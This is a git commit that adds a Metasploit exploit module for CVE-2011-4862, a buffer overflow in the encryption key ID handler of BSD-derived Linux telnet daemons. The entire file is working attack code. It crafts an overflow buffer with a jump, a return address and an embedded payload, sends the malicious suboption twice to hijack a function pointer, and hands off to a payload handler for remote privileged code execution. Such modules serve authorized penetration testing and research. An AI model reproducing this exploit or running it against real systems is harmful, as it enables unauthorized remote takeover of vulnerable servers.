Add Linux exploit with one sample target (Whitebox Linux 3)

2011-12-28 00:00:10 -06:00 · 2011-12-28 00:00:10 -06:00 · edb9843ef9
parent 79103074cb
commit edb9843ef9
1 changed files with 120 additions and 0 deletions
--- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
+++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb
@ -0,0 +1,120 @@
+##
+# $Id: $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+	
+	include Msf::Exploit::Remote::Telnet
+	include Msf::Exploit::BruteTargets
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow',
+			'Description'    => %q{	
+					This module exploits a buffer overflow in the encryption option handler of the
+				Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
+				use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
+				Linux systems running telnetd.
+				},
+			'Author'         => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['BID', '51182'],
+					['CVE', '2011-4862'],
+					['URL', 'http://www.exploit-db.com/exploits/18280/']
+				],
+			'Privileged'     => true,
+			'Platform'       => 'linux',
+			'Payload'        =>
+				{
+					'Space'       => 200,
+					'BadChars'    => "\x00",
+					'DisableNops' => true,
+				},
+ 
+			'Targets'        =>
+				[
+					[ 'Automatic',  { } ],			
+					[ 'White Box Linux 3 (krb5-telnet)',         { 'Ret' => 0x0804b43c } ],
+										
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => ''))
+	end
+
+	def exploit_target(t)
+	
+		connect
+		banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
+		print_status(banner_sanitized) if datastore['VERBOSE']
+
+		enc_init      = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
+		enc_keyid     = "\xff\xfa\x26\x07"
+		end_suboption = "\xff\xf0"
+
+		penc = payload.encoded.gsub("\xff", "\xff\xff")
+		
+		key_id = Rex::Text.rand_text_alphanumeric(400)
+
+		key_id[ 0, 2] = "\xeb\x76"
+		key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
+		key_id[76, 4] = [ t['Ret'] ].pack("V")		
+		
+		# Some of these bytes can get mangled, jump over them
+		key_id[80,40]  = "\x41" * 40
+		
+		# Insert the real payload
+		key_id[120, penc.length] = penc
+		
+		# Create the Key ID command
+		sploit = enc_keyid + key_id + end_suboption
+
+		# Initiate encryption
+		sock.put(enc_init)
+		
+		# Wait for a successful response
+		loop do
+			data = sock.get_once(-1, 5) rescue nil
+			if not data
+				raise RuntimeError, "This system does not support encryption"
+			end
+			break if data.index("\xff\xfa\x26\x02\x01")
+		end
+
+		# The first request smashes the pointer
+		print_status("Sending first payload")
+		sock.put(sploit) 
+		
+		# Make sure the server replied to the first request
+		data = sock.get_once(-1, 5)
+		unless data
+			print_status("Server did not respond to first payload")
+			return
+		end
+
+		# Some delay between each request seems necessary in some cases
+		::IO.select(nil, nil, nil, 0.5)
+			
+		# The second request results in the pointer being called
+		print_status("Sending second payload...")
+		sock.put(sploit)
+		handler
+		
+		::IO.select(nil, nil, nil, 0.5)
+		disconnect
+	end
+
+end